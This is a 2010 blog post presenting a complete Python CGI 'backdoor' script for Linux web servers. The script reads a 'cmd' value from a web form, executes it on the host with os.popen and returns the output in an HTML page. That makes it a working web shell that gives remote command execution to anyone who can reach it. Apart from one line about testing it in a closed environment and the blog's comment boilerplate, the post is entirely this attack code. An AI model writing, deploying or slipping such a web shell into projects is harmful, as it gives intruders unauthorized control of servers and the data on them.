CGI Backdoor for Linux with Python

14 Oct

CGI Backdoor for Linux with Python

Posted October 14, 2010 by otoy in Code, Hacking, Python, Security Tools. Leave a Comment

#!/usr/bin/env python
# Info  : Linux based CGI backdoor with python
# author: otoy
# date  : 0x102010

import cgi,os,re,sys

form = cgi.FieldStorage()
cmd = form.getvalue('cmd', '')
osexe = os.popen(cmd)

dirt = os.getcwd()+'/'
prognm = sys.argv[0].strip()
progfl = re.findall(dirt+'(.*)',prognm)[0]

osinf = os.uname()
info='''====================================
       CGI python backdoor
====================================
Author : otoy
Date   : 0x102010
Blog   : <a href="http://otoyrood.wordpress.com" target="_blak">otoyrood.wordpress.com</a>
====================================
System : %s %s
====================================
''' %(osinf[0], osinf[2])

print "Content-type: text/html"
print

print"""
<html>
  <head>
    <title>CGI python backdoor</title>
  </head>
  <body>
    <pre>%s</pre>
    <form action='%s'>
       Command <input type='text' name='cmd' />
    <input type='submit' />
    </form>
    <pre>%s</pre>
  </body>
</html>
""" %(info,progfl,osexe.read())

in action :

PS: if you wanna try this code in your closed environment, you can read this link or this one, it will show you how to run CGI module on your apache server.

Like this:

Be the first to like this post.

Leave a Reply Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Email (required) (Not published)

Name (required)

Website

You are commenting using your WordPress.com account. ( Log Out / Change )

You are commenting using your Twitter account. ( Log Out / Change )

You are commenting using your Facebook account. ( Log Out / Change )

Cancel

Connecting to %s

Otoy's Blog Pusing-Pusing Aseeeekk